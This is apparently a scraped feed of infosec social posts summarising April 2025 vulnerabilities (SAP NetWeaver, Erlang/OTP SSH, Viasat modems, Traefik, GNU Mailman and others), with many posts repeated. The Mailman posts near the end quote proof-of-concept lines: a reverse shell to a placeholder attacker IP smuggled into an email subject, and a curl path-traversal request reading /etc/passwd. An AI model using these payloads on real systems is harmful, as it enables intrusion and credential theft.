SAP zero-day vulnerability under widespread active exploitation https://cyberscoop.com/sap-netweaver-zero-day-exploit-cve-2025-31324/

More about the SAP NetWeaver zero-day vulnerability. A patch has been released.

Tenable: CVE-2025-31324: Zero-Day Vulnerability in SAP NetWeaver Exploited in the Wild https://www.tenable.com/blog/cve-2025-31324-zero-day-vulnerability-in-sap-netweaver-exploited-in-the-wild @tenable #cybersecurity #infosec #zeroday

@campuscodi I have heard that CVE-2025-31324 is in fact under active exploitation. I haven't heard confirmation that the exploitation observed by ReliaQuest in that article is it, but at this point, it doesn't ( or at least shouldn't ) matter to defenders.

SAP zero-day vulnerability under widespread active exploitation https://cyberscoop.com/sap-netweaver-zero-day-exploit-cve-2025-31324/

More about the SAP NetWeaver zero-day vulnerability. A patch has been released.

Tenable: CVE-2025-31324: Zero-Day Vulnerability in SAP NetWeaver Exploited in the Wild https://www.tenable.com/blog/cve-2025-31324-zero-day-vulnerability-in-sap-netweaver-exploited-in-the-wild @tenable #cybersecurity #infosec #zeroday

@campuscodi I have heard that CVE-2025-31324 is in fact under active exploitation. I haven't heard confirmation that the exploitation observed by ReliaQuest in that article is it, but at this point, it doesn't ( or at least shouldn't ) matter to defenders.

Tracked as CVE-2025-31324 (CVSS score of 10/10), the security defect is described as the lack of proper authorization (missing authorization check) in the Visual Composer Metadata Uploader component of SAP NetWeaver. https://www.securityweek.com/sap-zero-day-possibly-exploited-by-initial-access-broker/

🚨SAP NetWeaver Vulnerability (CVE-2025-31324) Allows Remote Code Execution via File Upload Flaw

https://darkwebinformer.com/sap-netweaver-vulnerability-cve-2025-31324-allows-remote-code-execution-via-file-upload-flaw/

A perfect 10 in SAP NetWeaver? Yes please. 🥳

https://me.sap.com/notes/3594142

sev:CRIT 10.0 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

SAP NetWeaver Visual Composer Metadata Uploader is not protected with a proper authorization, allowing unauthenticated agent to upload potentially malicious executable binaries that could severely harm the host system. This could significantly affect the confidentiality, integrity, and availability of the targeted system.

https://nvd.nist.gov/vuln/detail/CVE-2025-31324

Cisco updated the list again. Here are the currently listed Cisco system vulnerable to the Erlang / OTP perfect 10 CVE-2025-32433 ( additions in bold:

• ConfD, ConfD Basic
• Network Services Orchestrator (NSO)
• Smart PHY
• Ultra Services Platform
• ASR 5000 Series Software (StarOS) and Ultra Packet Core
• Cloud Native Broadband Network Gateway
• iNode Manager ( No fix planned. )
• Ultra Cloud Core - Access and Mobility Management Function
• Ultra Cloud Core - Policy Control Function
• Ultra Cloud Core - Redundancy Configuration Manager
• Ultra Cloud Core - Session Management Function
• Ultra Cloud Core - Subscriber Microservices Infrastructure
• Enterprise NFV Infrastructure Software (NFVIS)
• Small Business RV Series Routers RV160, RV160W, RV260, RV260P, RV260W, RV340, RV340W, RV345, RV345P ( No fix planned. )

The products still being evaluated, hopefully to be complete by EoD today ( my hope, nothing hinting to that from Cisco ):

• Wide Area Application Services (WAAS) Software

This was updated yesterday.

Cisco: Multiple Cisco Products Unauthenticated Remote Code Execution in Erlang/OTP SSH Server - CVE-2025-32433: April 2025 (critical) https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-erlang-otp-ssh-xyZZy @TalosSecurity #cybersecurity #infosec

For those playing along at home, here are the currently listed Cisco system vulnerable to the Erlang / OTP perfect 10 CVE-2025-32433:

• ConfD, ConfD Basic
• Network Services Orchestrator (NSO)
• Smart PHY
• ASR 5000 Series Software (StarOS) and Ultra Packet Core
• iNode Manager ( No fix planned. )
• Ultra Cloud Core - Access and Mobility Management Function
• Ultra Cloud Core - Redundancy Configuration Manager
• Ultra Cloud Core - Session Management Function
• Ultra Cloud Core - Subscriber Microservices Infrastructure
• Enterprise NFV Infrastructure Software (NFVIS)
• Small Business RV Series Routers RV160, RV160W, RV260, RV260P, RV260W, RV340, RV340W, RV345, RV345P ( No fix planned. )

The products still being evaluated, hopefully to be complete by EoD today ( my hope, nothing hinting to that from Cisco ):

• Wide Area Application Services (WAAS) Software
• Virtualized Infrastructure Manager
• Catalyst Center, formerly DNA Center
• Ultra Cloud Core - Policy Control Function

Cisco updated the list again. Here are the currently listed Cisco system vulnerable to the Erlang / OTP perfect 10 CVE-2025-32433 ( additions in bold:

• ConfD, ConfD Basic
• Network Services Orchestrator (NSO)
• Smart PHY
• Ultra Services Platform
• ASR 5000 Series Software (StarOS) and Ultra Packet Core
• Cloud Native Broadband Network Gateway
• iNode Manager ( No fix planned. )
• Ultra Cloud Core - Access and Mobility Management Function
• Ultra Cloud Core - Policy Control Function
• Ultra Cloud Core - Redundancy Configuration Manager
• Ultra Cloud Core - Session Management Function
• Ultra Cloud Core - Subscriber Microservices Infrastructure
• Enterprise NFV Infrastructure Software (NFVIS)
• Small Business RV Series Routers RV160, RV160W, RV260, RV260P, RV260W, RV340, RV340W, RV345, RV345P ( No fix planned. )

The products still being evaluated, hopefully to be complete by EoD today ( my hope, nothing hinting to that from Cisco ):

• Wide Area Application Services (WAAS) Software

This was updated yesterday.

Cisco: Multiple Cisco Products Unauthenticated Remote Code Execution in Erlang/OTP SSH Server - CVE-2025-32433: April 2025 (critical) https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-erlang-otp-ssh-xyZZy @TalosSecurity #cybersecurity #infosec

For those playing along at home, here are the currently listed Cisco system vulnerable to the Erlang / OTP perfect 10 CVE-2025-32433:

• ConfD, ConfD Basic
• Network Services Orchestrator (NSO)
• Smart PHY
• ASR 5000 Series Software (StarOS) and Ultra Packet Core
• iNode Manager ( No fix planned. )
• Ultra Cloud Core - Access and Mobility Management Function
• Ultra Cloud Core - Redundancy Configuration Manager
• Ultra Cloud Core - Session Management Function
• Ultra Cloud Core - Subscriber Microservices Infrastructure
• Enterprise NFV Infrastructure Software (NFVIS)
• Small Business RV Series Routers RV160, RV160W, RV260, RV260P, RV260W, RV340, RV340W, RV345, RV345P ( No fix planned. )

The products still being evaluated, hopefully to be complete by EoD today ( my hope, nothing hinting to that from Cisco ):

• Wide Area Application Services (WAAS) Software
• Virtualized Infrastructure Manager
• Catalyst Center, formerly DNA Center
• Ultra Cloud Core - Policy Control Function

Cisco is investigating the impact of the Erlang/OTP remote code execution vulnerability CVE-2025-32433 on its products. https://www.securityweek.com/cisco-confirms-some-products-impacted-by-critical-erlang-otp-flaw/

A few quick notes on the Erlang OTP SSHd RCE (CVE-2025-32433):

1. Cisco confirmed that ConfD and NSO products are affected (ports 830, 2022, and 2024 versus 22)

2. Signatures looking for clear-text channel open and exec calls will miss exploits that deliver the same payloads after the key exchange.

3. If you find a machine in your environment and can't disable the service, running the exploit with the payload `ssh:stop().` will shut down the SSH service temporarily.

https://www.runzero.com/blog/erlang-otp-ssh/

How I Used AI to Create a Working Exploit for CVE-2025-32433 Before Public PoCs Existed | Platform Security Blog https://platformsecurity.com/blog/CVE-2025-32433-poc

Cisco, published yesterday (critical): Multiple Cisco Products Unauthenticated Remote Code Execution in Erlang/OTP SSH Server - CVE-2025-32433 https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-erlang-otp-ssh-xyZZy @TalosSecurity #cybersecurity #infosec

If your company sells a product with limited visibility into the underlying systems ( network appliances, etc. ) and you have not yet published an advisory or doc stating whether or not your products are impacted by the Erlang / OTP perfect 10 CVE-2025-32433, then you are not my friend and I hope you step on a lego in the middle of the night.

The Register: Today’s LLMs craft exploits from patches at lightning speed . “Matthew Keely, of Platform Security and penetration testing firm ProDefense, managed to cobble together a working exploit for a critical vulnerability in Erlang’s SSH library (CVE-2025-32433) in an afternoon, although the AI he used had some help – the model was able to use code from an already published patch in the […]

https://rbfirehose.com/2025/04/23/the-register-todays-llms-craft-exploits-from-patches-at-lightning-speed/

PoC exploit for critical Erlang/OTP SSH bug is public (CVE-2025-32433) https://www.helpnetsecurity.com/2025/04/22/working-poc-exploit-for-critical-erlang-otp-ssh-bug-is-public-cve-2025-32433/ #RuhrUniversityBochum #ArcticWolfNetworks #PlatformSecurity #vulnerability #Horizon3ai #ProDefense #Don'tmiss #Hotstuff #exploit #News #PoC #SSH

Erlang/OTP RCE (CVE-2025-32433) https://fortiguard.fortinet.com/threat-signal-report/6077

Critical Erlang/OTP SSH RCE bug now has public exploits, patch now

Public exploits are now available for a critical Erlang/OTP SSH vulnerability tracked as CVE-2025-32433, allowing unauthenticated attackers to...

🔗️ [Bleepingcomputer] https://link.is.it/weapzq

Picus: CVE-2025-32433: Erlang/OTP SSH Remote Code Execution Vulnerability Explained https://www.picussecurity.com/resource/blog/cve-2025-32433-erlang-otp-ssh-remote-code-execution-vulnerability-explained #cybersecurity #Infosec

Looks like there's a CVE for yesterday's ScreenConnect vuln now.

https://nvd.nist.gov/vuln/detail/CVE-2025-3935

Looks like there's a CVE for yesterday's ScreenConnect vuln now.

https://nvd.nist.gov/vuln/detail/CVE-2025-3935

Three vulns published in FileZ, all sev:MED 5.1 but this one sounded more interesting:

FileZ 客户端报告了一个跨站脚本攻击漏洞，如果本地用户访问伪造的链接，则可能会执行代码。CVE-2025-2069

Translation via LibreWolf:

The FileZ client reported a cross-site scripting vulnerability that could execute code if a local user accesses a forged link. CVE-2025-2069

https://www.filez.com/securityPolicy/2.html?1744703100

Three vulns published in FileZ, all sev:MED 5.1 but this one sounded more interesting:

FileZ 客户端报告了一个跨站脚本攻击漏洞，如果本地用户访问伪造的链接，则可能会执行代码。CVE-2025-2069

Translation via LibreWolf:

The FileZ client reported a cross-site scripting vulnerability that could execute code if a local user accesses a forged link. CVE-2025-2069

https://www.filez.com/securityPolicy/2.html?1744703100

CVE published for a Commvault advisory from last month about "an unspecifiec vulnerability".

https://documentation.commvault.com/securityadvisories/CV_2025_03_1.html

sev:HIGH 8.7 - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Commvault Web Server has an unspecified vulnerability that can be exploited by a remote, authenticated attacker. According to the Commvault advisory: "Webservers can be compromised through bad actors creating and executing webshells." Fixed in version 11.36.46, 11.32.89, 11.28.141, and 11.20.217 for Windows and Linux platforms.

https://nvd.nist.gov/vuln/detail/CVE-2025-3928

CVE published for a Commvault advisory from last month about "an unspecifiec vulnerability".

https://documentation.commvault.com/securityadvisories/CV_2025_03_1.html

sev:HIGH 8.7 - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Commvault Web Server has an unspecified vulnerability that can be exploited by a remote, authenticated attacker. According to the Commvault advisory: "Webservers can be compromised through bad actors creating and executing webshells." Fixed in version 11.36.46, 11.32.89, 11.28.141, and 11.20.217 for Windows and Linux platforms.

https://nvd.nist.gov/vuln/detail/CVE-2025-3928

"Zu viel Interesse an Moodle-Kursen" ist eher kein so gängiges Sicherheitsproblem an Unis, oder? https://access.redhat.com/security/cve/CVE-2025-3634 #Moodle #CVE

Who wants to skip courses in Moodle?

https://access.redhat.com/security/cve/CVE-2025-3634

A security vulnerability was discovered in Moodle that allows students to enroll themselves in courses without completing all the necessary safety checks. Specifically, users can sign up for courses prematurely, even if they haven't finished two-step verification processes.

"Zu viel Interesse an Moodle-Kursen" ist eher kein so gängiges Sicherheitsproblem an Unis, oder? https://access.redhat.com/security/cve/CVE-2025-3634 #Moodle #CVE

Who wants to skip courses in Moodle?

https://access.redhat.com/security/cve/CVE-2025-3634

A security vulnerability was discovered in Moodle that allows students to enroll themselves in courses without completing all the necessary safety checks. Specifically, users can sign up for courses prematurely, even if they haven't finished two-step verification processes.

Who doesn't like RCE in Viastat modems? Well here's two of them. Happy Friday.

https://www.onekey.com/resource/security-advisory-rce-on-viasat-modems-cve-2024-6198

sev:HIGH 7.7 - CVSS:4.0/AV:A/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/S:N/AU:Y/R:U/V:C/RE:M/U:Red

The device exposes a web interface on ports TCP/3030 and TCP/9882. This web service runs lighttpd, which implements the “SNORE” interface. This interface is affected by a stack buffer overflow vulnerability due to insecure path parsing. An attacker with access to the LAN network interface could use a specially crafted HTTP request to exploit a buffer overflow on the modem.

https://nvd.nist.gov/vuln/detail/CVE-2024-6198

https://www.onekey.com/resource/security-advisory-rce-on-viasat-modems-cve-2024-6199

sev:HIGH 7.7 - CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/S:N/AU:N/R:U/V:D/RE:M/U:Red

An unauthenticated attacker on the WAN interface, with the ability to intercept Dynamic DNS (DDNS) traffic between DDNS services and the modem, could manipulate specific responses to include code that forces a buffer overflow on the modem. Customers that have not enabled Dynamic DNS on their modem are not vulnerable.

https://nvd.nist.gov/vuln/detail/CVE-2024-6199

Who doesn't like RCE in Viastat modems? Well here's two of them. Happy Friday.

https://www.onekey.com/resource/security-advisory-rce-on-viasat-modems-cve-2024-6198

sev:HIGH 7.7 - CVSS:4.0/AV:A/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/S:N/AU:Y/R:U/V:C/RE:M/U:Red

The device exposes a web interface on ports TCP/3030 and TCP/9882. This web service runs lighttpd, which implements the “SNORE” interface. This interface is affected by a stack buffer overflow vulnerability due to insecure path parsing. An attacker with access to the LAN network interface could use a specially crafted HTTP request to exploit a buffer overflow on the modem.

https://nvd.nist.gov/vuln/detail/CVE-2024-6198

https://www.onekey.com/resource/security-advisory-rce-on-viasat-modems-cve-2024-6199

sev:HIGH 7.7 - CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/S:N/AU:N/R:U/V:D/RE:M/U:Red

An unauthenticated attacker on the WAN interface, with the ability to intercept Dynamic DNS (DDNS) traffic between DDNS services and the modem, could manipulate specific responses to include code that forces a buffer overflow on the modem. Customers that have not enabled Dynamic DNS on their modem are not vulnerable.

https://nvd.nist.gov/vuln/detail/CVE-2024-6199

Who doesn't like RCE in Viastat modems? Well here's two of them. Happy Friday.

https://www.onekey.com/resource/security-advisory-rce-on-viasat-modems-cve-2024-6198

sev:HIGH 7.7 - CVSS:4.0/AV:A/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/S:N/AU:Y/R:U/V:C/RE:M/U:Red

The device exposes a web interface on ports TCP/3030 and TCP/9882. This web service runs lighttpd, which implements the “SNORE” interface. This interface is affected by a stack buffer overflow vulnerability due to insecure path parsing. An attacker with access to the LAN network interface could use a specially crafted HTTP request to exploit a buffer overflow on the modem.

https://nvd.nist.gov/vuln/detail/CVE-2024-6198

https://www.onekey.com/resource/security-advisory-rce-on-viasat-modems-cve-2024-6199

sev:HIGH 7.7 - CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/S:N/AU:N/R:U/V:D/RE:M/U:Red

An unauthenticated attacker on the WAN interface, with the ability to intercept Dynamic DNS (DDNS) traffic between DDNS services and the modem, could manipulate specific responses to include code that forces a buffer overflow on the modem. Customers that have not enabled Dynamic DNS on their modem are not vulnerable.

https://nvd.nist.gov/vuln/detail/CVE-2024-6199

Remote Code Execution on Viasat Modems (CVE-2024-6198) https://www.onekey.com/resource/security-advisory-rce-on-viasat-modems-cve-2024-6198

Who doesn't like RCE in Viastat modems? Well here's two of them. Happy Friday.

https://www.onekey.com/resource/security-advisory-rce-on-viasat-modems-cve-2024-6198

sev:HIGH 7.7 - CVSS:4.0/AV:A/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/S:N/AU:Y/R:U/V:C/RE:M/U:Red

The device exposes a web interface on ports TCP/3030 and TCP/9882. This web service runs lighttpd, which implements the “SNORE” interface. This interface is affected by a stack buffer overflow vulnerability due to insecure path parsing. An attacker with access to the LAN network interface could use a specially crafted HTTP request to exploit a buffer overflow on the modem.

https://nvd.nist.gov/vuln/detail/CVE-2024-6198

https://www.onekey.com/resource/security-advisory-rce-on-viasat-modems-cve-2024-6199

sev:HIGH 7.7 - CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/S:N/AU:N/R:U/V:D/RE:M/U:Red

An unauthenticated attacker on the WAN interface, with the ability to intercept Dynamic DNS (DDNS) traffic between DDNS services and the modem, could manipulate specific responses to include code that forces a buffer overflow on the modem. Customers that have not enabled Dynamic DNS on their modem are not vulnerable.

https://nvd.nist.gov/vuln/detail/CVE-2024-6199

Remote Code Execution on Viasat Modems (CVE-2024-6198) https://www.onekey.com/resource/security-advisory-rce-on-viasat-modems-cve-2024-6198

Go hack more AI shit.

TCPWave DDI 11.34P1C2 allows Remote Code Execution via Unrestricted File Upload (combined with Path Traversal).

https://github.com/Henkel-CyberVM/CVEs/blob/main/CVE-2025-43946/README.md

In case you don't know what TCPWave DDI is, this is the big banner on their homepage:

Easy To Use DDI Powered with
Alice Chatbot
Core DDI with Advanced Threat Intelligence to mitigate risks

https://nvd.nist.gov/vuln/detail/CVE-2025-43946

A ../ in a popular reverse proxy and load balancer? Happy Monday! But at least we now know for sure how to pronounce it when we report it to the various teams.

https://github.com/traefik/traefik/security/advisories/GHSA-6p68-w45g-48j7

sev:HIGH 8.8 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P

Traefik (pronounced traffic) is an HTTP reverse proxy and load balancer. In versions prior to 2.11.24, 3.3.6, and 3.4.0-rc2. There is a potential vulnerability in Traefik managing the requests using a PathPrefix, Path or PathRegex matcher. When Traefik is configured to route the requests to a backend using a matcher based on the path, if the URL contains a /../ in its path, it’s possible to target a backend, exposed using another router, by-passing the middlewares chain. This issue has been patched in versions 2.11.24, 3.3.6, and 3.4.0-rc2. A workaround involves adding a PathRegexp rule to the matcher to prevent matching a route with a /../ in the path.

https://nvd.nist.gov/vuln/detail/CVE-2025-32431

I thought quantum was supposed to save security or something?

https://www.quantum.com/en/service-support/security-bulletins/stornext-gui-multiple-security-vulnerabilities-stornext-gui-multiple-security-vulnerabilities/

sev:CRIT 9.9 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Quantum StorNext Web GUI API before 7.2.4 allows potential Arbitrary Remote Code Execution (RCE) via upload of a file. This affects StorNext RYO before 7.2.4, StorNext Xcellis Workflow Director before 7.2.4, and ActiveScale Cold Storage.

https://nvd.nist.gov/vuln/detail/CVE-2025-46616

HTTP Smuggling in Python h11.

https://github.com/python-hyper/h11/security/advisories/GHSA-vqfr-h8mv-ghfj

sev:CRIT 9.1 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

h11 is a Python implementation of HTTP/1.1. Prior to version 0.16.0, a leniency in h11's parsing of line terminators in chunked-coding message bodies can lead to request smuggling vulnerabilities under certain conditions. This issue has been patched in version 0.16.0. Since exploitation requires the combination of buggy h11 with a buggy (reverse) proxy, fixing either component is sufficient to mitigate this issue.

https://nvd.nist.gov/vuln/detail/CVE-2025-43859

Ooh, a BoF in Johnson Controls iStar Configuration Utility tool.

https://www.johnsoncontrols.com/-/media/project/jci-global/johnson-controls/us-region/united-states-johnson-controls/cyber-solutions/security-advisories/documents/jci-psa-2025-04.pdf

sev:CRIT 9.3 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Under certain circumstances the iSTAR Configuration Utility (ICU) tool could have a buffer overflow issue

https://nvd.nist.gov/vuln/detail/CVE-2025-26382

This other advisory from last June was also updated today.

https://www.johnsoncontrols.com/-/media/project/jci-global/johnson-controls/us-region/united-states-johnson-controls/cyber-solutions/security-advisories/documents/jci-psa-2024-06-v2.pdf

sev:HIGH 8.8 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N

Johnson Controls has confirmed a vulnerability impacting the Software House iSTAR Configuration Utility (ICU) tool for Software House iSTAR Pro, Edge, eX, Ultra and Ultra LT door controllers which may result in insecure communications.

https://nvd.nist.gov/vuln/detail/CVE-2024-32752

Johnson Controls reports critical vulnerability in ICU tool

A critical stack-based buffer overflow vulnerability (CVE-2025-26382, CVSS 9.8) in Johnson Controls' ICU tool affects versions prior to 6.9.5, allowing unauthenticated remote attackers to execute arbitrary code and potentially gain complete system control.

**If you are using Johnson Controls' ICU tool, the usual rules apply - Make sure it's isolated from the internet and accessible only from trusted networks. Then plan a patch, because every isolation can be breached given enough time.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/johnson-controls-reports-critical-vulnerability-in-icu-tool-g-p-n-0-s/gD2P6Ple2L

Ooh, a BoF in Johnson Controls iStar Configuration Utility tool.

https://www.johnsoncontrols.com/-/media/project/jci-global/johnson-controls/us-region/united-states-johnson-controls/cyber-solutions/security-advisories/documents/jci-psa-2025-04.pdf

sev:CRIT 9.3 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Under certain circumstances the iSTAR Configuration Utility (ICU) tool could have a buffer overflow issue

https://nvd.nist.gov/vuln/detail/CVE-2025-26382

This other advisory from last June was also updated today.

https://www.johnsoncontrols.com/-/media/project/jci-global/johnson-controls/us-region/united-states-johnson-controls/cyber-solutions/security-advisories/documents/jci-psa-2024-06-v2.pdf

sev:HIGH 8.8 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N

Johnson Controls has confirmed a vulnerability impacting the Software House iSTAR Configuration Utility (ICU) tool for Software House iSTAR Pro, Edge, eX, Ultra and Ultra LT door controllers which may result in insecure communications.

https://nvd.nist.gov/vuln/detail/CVE-2024-32752

I've heard of people around here using youtube-dl. If you use the Youtube-DLSharp wrapper for it, heads-up.

https://github.com/Bluegrams/YoutubeDLSharp/security/advisories/GHSA-2jh5-g5ch-43q5

sev:CRIT 9.2 - CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L

YoutubeDLSharp is a wrapper for the command-line video downloaders youtube-dl and yt-dlp. In versions starting from 1.0.0-beta4 and prior to 1.1.2, an unsafe conversion of arguments allows the injection of a malicious commands when starting yt-dlp from a commands prompt running on Windows OS with the UseWindowsEncodingWorkaround value defined to true (default behavior). If a user is using built-in methods from the YoutubeDL.cs file, the value is true by default and a user cannot disable it from these methods. This issue has been patched in version 1.1.2.

https://nvd.nist.gov/vuln/detail/CVE-2025-43858

Heard of Rack, Ruby, or Infodraw lately? Well, some nasty Path Traversal and Log Manipulation bugs are doing the rounds again, and they're definitely something to watch out for.

First up, Rack's got a vulnerability in `Rack::Static` (that's CVE-2025-27610). Basically, it could let unwanted guests wander through directories where they have no business being. You *really* need to get that updated ASAP. Alternatively, if it works for your setup, just ditch `Rack::Static` altogether.

Then there's Infodraw MRS (CVE-2025-43928), and this one's a kicker: still *no* official patch available! 😬 Since this impacts video surveillance systems, your best bets for now involve taking affected systems offline if possible. If not, sticking them safely behind a VPN or locking things down tight with an IP whitelist should be top priorities.

It's worth remembering, automated scans often breeze right past issues like these. That's where manual testing truly shines – it's absolutely worth its weight in gold here! ☝️

So, what about you? Ever run into headaches with similar vulnerabilities? How are you keeping your own systems buttoned up against these kinds of threats? Let's talk!

#Cybersecurity #Pentest #PathTraversal #RCE

../ in LEA shit? Huh.

h/t @varbin

https://mint-secure.de/path-traversal-vulnerability-in-surveillance-software/

https://cfp.eh22.easterhegg.eu/eh22/talk/9UDXSE/

sev:MED 5.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N

But the reporter disagrees, which seems to be a theme lately. They claim it should be: sev:HIGH 7.2 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

In Infodraw Media Relay Service (MRS) 7.1.0.0, the MRS web server (on port 12654) allows reading arbitrary files via ../ directory traversal in the username field. Reading ServerParameters.xml may reveal administrator credentials in cleartext or with MD5 hashing.

https://nvd.nist.gov/vuln/detail/CVE-2025-43928

@da_667 JK. Have fun. cc: @Dio9sys

https://locrian-lightning-dc7.notion.site/CVE-2025-28021-BufferOverflow1-1948e5e2b1a280e8aa5ad87964c5cd3d

https://locrian-lightning-dc7.notion.site/CVE-2025-28022-BufferOverflow3-1948e5e2b1a280ec8061ed308b33b5bc

https://locrian-lightning-dc7.notion.site/BufferOverflow1-19e8e5e2b1a280bfbe52ec9975287f77

https://locrian-lightning-dc7.notion.site/CVE-2025-28028-BufferOverflow4-1948e5e2b1a280b9809af4db6f9e65d1

https://locrian-lightning-dc7.notion.site/CVE-2025-28020-BufferOverflow3-1948e5e2b1a280c28ef5c6e54b49324d

@da_667 JK. Have fun. cc: @Dio9sys

https://locrian-lightning-dc7.notion.site/CVE-2025-28021-BufferOverflow1-1948e5e2b1a280e8aa5ad87964c5cd3d

https://locrian-lightning-dc7.notion.site/CVE-2025-28022-BufferOverflow3-1948e5e2b1a280ec8061ed308b33b5bc

https://locrian-lightning-dc7.notion.site/BufferOverflow1-19e8e5e2b1a280bfbe52ec9975287f77

https://locrian-lightning-dc7.notion.site/CVE-2025-28028-BufferOverflow4-1948e5e2b1a280b9809af4db6f9e65d1

https://locrian-lightning-dc7.notion.site/CVE-2025-28020-BufferOverflow3-1948e5e2b1a280c28ef5c6e54b49324d

@da_667 JK. Have fun. cc: @Dio9sys

https://locrian-lightning-dc7.notion.site/CVE-2025-28021-BufferOverflow1-1948e5e2b1a280e8aa5ad87964c5cd3d

https://locrian-lightning-dc7.notion.site/CVE-2025-28022-BufferOverflow3-1948e5e2b1a280ec8061ed308b33b5bc

https://locrian-lightning-dc7.notion.site/BufferOverflow1-19e8e5e2b1a280bfbe52ec9975287f77

https://locrian-lightning-dc7.notion.site/CVE-2025-28028-BufferOverflow4-1948e5e2b1a280b9809af4db6f9e65d1

https://locrian-lightning-dc7.notion.site/CVE-2025-28020-BufferOverflow3-1948e5e2b1a280c28ef5c6e54b49324d

@da_667 JK. Have fun. cc: @Dio9sys

https://locrian-lightning-dc7.notion.site/CVE-2025-28021-BufferOverflow1-1948e5e2b1a280e8aa5ad87964c5cd3d

https://locrian-lightning-dc7.notion.site/CVE-2025-28022-BufferOverflow3-1948e5e2b1a280ec8061ed308b33b5bc

https://locrian-lightning-dc7.notion.site/BufferOverflow1-19e8e5e2b1a280bfbe52ec9975287f77

https://locrian-lightning-dc7.notion.site/CVE-2025-28028-BufferOverflow4-1948e5e2b1a280b9809af4db6f9e65d1

https://locrian-lightning-dc7.notion.site/CVE-2025-28020-BufferOverflow3-1948e5e2b1a280c28ef5c6e54b49324d

Another Apache vuln, this time in HttpClient.

https://lists.apache.org/thread/55xhs40ncqv97qvoocok44995xp5kqn8

A bug in PSL validation logic in Apache HttpClient 5.4.x disables domain checks, affecting cookie management and host name verification. Discovered by the Apache HttpClient team. Fixed in the 5.4.3 release

https://nvd.nist.gov/vuln/detail/CVE-2025-27820

ICYMI this weekend:

Command intention via email subject in GNU Mailman as shipped in cPanel. Note the difference of CVSS metrics between the original disclosure and the CNA ( MITRE ).

https://github.com/0NYX-MY7H/CVE-2025-43920

Per original disclosure ( it was updated yesterday to reflect the published CVSS ): sev:CRIT 9.8 - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Per CNA: sev:MED 5.4 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N

GNU Mailman 2.1.39, as bundled in cPanel (and WHM), allows unauthenticated attackers to execute arbitrary OS commands via shell metacharacters in an email Subject line.

PoC: Subject: ;bash -i >& /dev/tcp/ATTACKERIP/4444 0>&1

https://nvd.nist.gov/vuln/detail/CVE-2025-43920

There was also a nice ../ to go with it:

https://github.com/0NYX-MY7H/CVE-2025-43919

Per original disclosure ( it was updated yesterday to reflect the published CVSS ): sev:CRIT 9.8 - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Per CNA: sev:MED 5.4 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N

GNU Mailman 2.1.39, as bundled with cPanel and WHM, contains a critical directory traversal vulnerability in the /mailman/private/mailman endpoint. Unauthenticated attackers can exploit this flaw to read arbitrary files on the server, such as /etc/passwd or Mailman configuration files, due to insufficient input validation in the private.py CGI script. This vulnerability poses significant risks for information disclosure and can facilitate further attacks when combined with other exploits.

PoC: curl -X POST -d "username=../../../../etc/passwd&password=x&submit=Let+me+in..." http://target/mailman/private/mailman

https://nvd.nist.gov/vuln/detail/CVE-2025-43919

There's also an "Unauthorized Mailing List Creation in GNU Mailman 2.1.39":

https://github.com/0NYX-MY7H/CVE-2025-43921

If I ran cPanel with Mailman, looking at the advisories themselves, I would treat it with the original CVSS scores in mind rather than the ones provided by MITRE here.

Well if that command injection wasn't enough for you, how about a nice sev:CRIT ../ to go with it? Happy Easter.

https://github.com/0NYX-MY7H/CVE-2025-43919

There's also apparently a "Unauthorized Mailing List Creation in GNU Mailman 2.1.39" but the README on that one appears to be the one for the ../ so I don't have any details.

https://github.com/0NYX-MY7H/CVE-2025-43921

Edit to add the PoC: curl -X POST -d "username=../../../../etc/passwd&password=x&submit=Let+me+in..." http://target/mailman/private/mailman

#directoryTraversalMemes

Command intention via email subject in GNU Mailman. lol. lmao. It's interesting to see the difference of CVSS metrics between the disclosure and the CNA ( MITRE ).

https://github.com/0NYX-MY7H/CVE-2025-43920

